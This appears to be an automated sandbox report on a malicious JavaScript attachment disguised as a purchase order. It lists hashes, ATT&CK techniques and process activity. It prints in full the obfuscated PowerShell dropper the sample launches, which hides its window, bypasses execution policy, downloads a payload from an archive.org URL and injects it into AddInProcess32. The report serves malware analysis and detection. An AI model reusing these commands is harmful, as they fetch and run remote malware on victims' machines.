a9c5c01d0705146e44393b597a5822ea87e48c8cbd43dbf69e9228af4511584f

General

Target

Purchase Order . September Deelivery.js
Size

602KB
MD5

c99eede8df6223c9f608dbc64dee57ff
SHA1

a6df986b275fabe045dda8b6d3d34c3cd7640aad
SHA256

574403dce45be3a5edec18e66f16fef5e013ce99c7713479ab67c11e6f472330
SHA512

b68bd89a6a06b3f33b923898bbdeb95bb796ee2be1733bc94758006f67d7fa0a596fea889545c8ddf1d3b2049f662d4b0c5e99d38aef3eaa81d445babf6b10ea
SSDEEP

12288:o2QfMbARmlPDpIZDA48VcnheZB4HGLUtc0riOhuuMtn2kqZrjCU87cG/Q12oaCMs:X7GZiwzx1ZLwLsD

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2348	powershell.exe
6	2348	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2348	powershell.exe
1872	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1872	powershell.exe
2348	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 1872	2556	wscript.exe	30
PID 2556 wrote to memory of 1872	2556	wscript.exe	30
PID 2556 wrote to memory of 1872	2556	wscript.exe	30
PID 1872 wrote to memory of 2348	1872	powershell.exe	32
PID 1872 wrote to memory of 2348	1872	powershell.exe	32
PID 1872 wrote to memory of 2348	1872	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Order . September Deelivery.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAG8AZABMACcAKwAnAHUAJwArACcAcgAnACsAJwBsACAAPQAgAEoAQgAnACsAJwBuAGgAdAAnACsAJwB0AHAAcwA6AC8ALwAnACsAJwBpAGEAJwArACcAOQAwADQANgAnACsAJwAwADEALgB1AHMALgAnACsAJwBhAHIAYwBoACcAKwAnAGkAdgBlAC4AbwByAGcAJwArACcALwA2ACcAKwAnAC8AaQB0AGUAJwArACcAbQAnACsAJwBzAC8AZAAnACsAJwBlAHQAJwArACcAYQBoAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgATgBvAHQAZQBKAC4AdAAnACsAJwB4AHQASgAnACsAJwBCAG4AJwArACcAOwAnACsAJwBvAGQATABiAGEAcwBlADYANABDAG8AbgB0AGUAJwArACcAbgB0ACcAKwAnACAAJwArACcAPQAnACsAJwAgACcAKwAnACgATgBlAHcALQBPAGIAagBlAGMAdAAnACsAJwAgACcAKwAnAFMAeQAnACsAJwBzAHQAZQBtACcAKwAnAC4ATgBlACcAKwAnAHQALgBXAGUAYgBDAGwAJwArACcAaQBlAG4AJwArACcAdAApACcAKwAnAC4ARABvAHcAbgAnACsAJwBsAG8AJwArACcAYQBkAFMAdAAnACsAJwByACcAKwAnAGkAbgAnACsAJwBnACgAbwBkAEwAdQByAGwAKQA7AG8AJwArACcAZABMAGIAaQAnACsAJwBuAGEAcgB5ACcAKwAnAEMAbwBuAHQAJwArACcAZQBuACcAKwAnAHQAIAA9ACAAWwBTAHkAJwArACcAcwB0ACcAKwAnAGUAJwArACcAbQAuAEMAbwBuACcAKwAnAHYAZQByAHQAXQAnACsAJwA6ADoARgAnACsAJwByACcAKwAnAG8AbQBCACcAKwAnAGEAJwArACcAcwBlADYANAAnACsAJwBTACcAKwAnAHQAJwArACcAcgBpAG4AJwArACcAZwAoAG8AJwArACcAZAAnACsAJwBMACcAKwAnAGIAYQBzACcAKwAnAGUANgAnACsAJwA0ACcAKwAnAEMAbwBuACcAKwAnAHQAZQBuAHQAKQA7ACcAKwAnAG8AZAAnACsAJwBMAGEAcwBzAGUAbQAnACsAJwBiAGwAJwArACcAeQAnACsAJwAgAD0AIABbACcAKwAnAFIAZQBmACcAKwAnAGwAZQBjACcAKwAnAHQAaQAnACsAJwBvAG4ALgBBAHMAcwBlACcAKwAnAG0AJwArACcAYgBsAHkAXQAnACsAJwA6ADoATABvACcAKwAnAGEAJwArACcAZAAoAG8AJwArACcAZAAnACsAJwBMACcAKwAnAGIAaQBuACcAKwAnAGEAJwArACcAcgAnACsAJwB5AEMAJwArACcAbwAnACsAJwBuACcAKwAnAHQAZQAnACsAJwBuAHQAKQAnACsAJwA7ACcAKwAnAG8AZAAnACsAJwBMAHQAeQAnACsAJwBwAGUAIAAnACsAJwA9ACAAbwBkACcAKwAnAEwAJwArACcAYQBzACcAKwAnAHMAZQBtAGIAJwArACcAbAB5AC4ARwBlACcAKwAnAHQAVAB5AHAAZQAoACcAKwAnAEoAQgBuAFIAJwArACcAdQBuAFAARQAnACsAJwAuAEgAbwAnACsAJwBtAGUASgBCAG4AKQA7ACcAKwAnAG8AZABMACcAKwAnAG0AZQB0ACcAKwAnAGgAJwArACcAbwAnACsAJwBkACcAKwAnACAAJwArACcAPQAnACsAJwAgACcAKwAnAG8AJwArACcAZAAnACsAJwBMAHQAJwArACcAeQBwACcAKwAnAGUAJwArACcALgBHAGUAdABNACcAKwAnAGUAdABoAG8AZAAoAEoAQgBuACcAKwAnAFYAQQAnACsAJwBJAEoAQgBuACkAOwBvAGQATABtAGUAdABoAG8AZAAuAEkAbgAnACsAJwB2AG8AawBlACgAbwBkAEwAbgB1AGwAbAAsACAAWwBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACsAJwBbAF0AJwArACcAXQBAACgASgAnACsAJwBCAG4AdAAnACsAJwB4AHQALgBlAG4AbwBjACcAKwAnAGEAJwArACcAbQAvACcAKwAnAHYAZQBkACcAKwAnAC4AMgAnACsAJwByACcAKwAnAC4AJwArACcAMwA5AGIAMwA0ACcAKwAnADUAMwAnACsAJwAwADIAYQAwADcANQBiADEAJwArACcAYgAnACsAJwBjADAAZAAnACsAJwA0ADUAYgA2ADMAJwArACcAMgBlAGIAOQAnACsAJwBlACcAKwAnAGUANgAyAC0AYgB1AHAAJwArACcALwAvADoAcwAnACsAJwBwAHQAdABoACcAKwAnAEoAQgAnACsAJwBuACAALAAnACsAJwAgAEoAQgBuAGQAZQBzAGEAJwArACcAdAAnACsAJwBpACcAKwAnAHYAYQBkAG8ASgAnACsAJwBCACcAKwAnAG4AJwArACcAIAAsACAAJwArACcASgBCAG4AJwArACcAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBKAEIAbgAnACsAJwAgACwAIABKAEIAJwArACcAbgBkAGUAcwBhAHQAaQB2ACcAKwAnAGEAZAAnACsAJwBvACcAKwAnAEoAJwArACcAQgBuACwASgBCAG4AJwArACcAQQBkAGQASQBuAFAAcgBvAGMAJwArACcAZQBzAHMAMwAyAEoAJwArACcAQgBuACwASgAnACsAJwBCACcAKwAnAG4AZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBKACcAKwAnAEIAbgApACcAKwAnACkAOwAnACkALgBSAGUAUABsAGEAQwBlACgAJwBKAEIAbgAnACwAWwBTAFQAUgBJAE4ARwBdAFsAQwBoAGEAUgBdADMAOQApAC4AUgBlAFAAbABhAEMAZQAoACgAWwBDAGgAYQBSAF0AMQAxADEAKwBbAEMAaABhAFIAXQAxADAAMAArAFsAQwBoAGEAUgBdADcANgApACwAJwAkACcAKQB8ACAALgAgACgAIAAkAFAAcwBoAE8AbQBFAFsANABdACsAJABQAHMASABvAE0ARQBbADMANABdACsAJwB4ACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('odL'+'u'+'r'+'l = JB'+'nht'+'tps://'+'ia'+'9046'+'01.us.'+'arch'+'ive.org'+'/6'+'/ite'+'m'+'s/d'+'et'+'ah-note-j/DetahNoteJ.t'+'xtJ'+'Bn'+';'+'odLbase64Conte'+'nt'+' '+'='+' '+'(New-Object'+' '+'Sy'+'stem'+'.Ne'+'t.WebCl'+'ien'+'t)'+'.Down'+'lo'+'adSt'+'r'+'in'+'g(odLurl);o'+'dLbi'+'nary'+'Cont'+'en'+'t = [Sy'+'st'+'e'+'m.Con'+'vert]'+'::F'+'r'+'omB'+'a'+'se64'+'S'+'t'+'rin'+'g(o'+'d'+'L'+'bas'+'e6'+'4'+'Con'+'tent);'+'od'+'Lassem'+'bl'+'y'+' = ['+'Ref'+'lec'+'ti'+'on.Asse'+'m'+'bly]'+'::Lo'+'a'+'d(o'+'d'+'L'+'bin'+'a'+'r'+'yC'+'o'+'n'+'te'+'nt)'+';'+'od'+'Lty'+'pe '+'= od'+'L'+'as'+'semb'+'ly.Ge'+'tType('+'JBnR'+'unPE'+'.Ho'+'meJBn);'+'odL'+'met'+'h'+'o'+'d'+' '+'='+' '+'o'+'d'+'Lt'+'yp'+'e'+'.GetM'+'ethod(JBn'+'VA'+'IJBn);odLmethod.In'+'voke(odLnull, [o'+'bje'+'ct'+'[]'+']@(J'+'Bnt'+'xt.enoc'+'a'+'m/'+'ved'+'.2'+'r'+'.'+'39b34'+'53'+'02a075b1'+'b'+'c0d'+'45b63'+'2eb9'+'e'+'e62-bup'+'//:s'+'ptth'+'JB'+'n ,'+' JBndesa'+'t'+'i'+'vadoJ'+'B'+'n'+' , '+'JBn'+'de'+'sativadoJBn'+' , JB'+'ndesativ'+'ad'+'o'+'J'+'Bn,JBn'+'AddInProc'+'ess32J'+'Bn,J'+'B'+'ndesat'+'ivadoJ'+'Bn)'+');').RePlaCe('JBn',[STRING][ChaR]39).RePlaCe(([ChaR]111+[ChaR]100+[ChaR]76),'$')| . ( $PshOmE[4]+$PsHoME[34]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4292d8a8f1f0abec7a54141f0dbc186a

SHA1
4603cdd937550ba3c1e84c757c6b31e96ce8d178

SHA256
f1df06402d1b3f13a215bec46403648bc1497462c91d1a7285d254cb5b2e2471

SHA512
6123b628a5a54d26d4137ab55ceb820b54ddc3585eb83527492c25775717fb124fc7a760a105fd54d77a7607ded44fe1641c88d19010fb6c799548fe35048ad9

Download Submit
memory/1872-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

Filesize
4KB

Download
memory/1872-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/1872-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/1872-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/1872-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/1872-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/1872-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/1872-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/1872-17-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing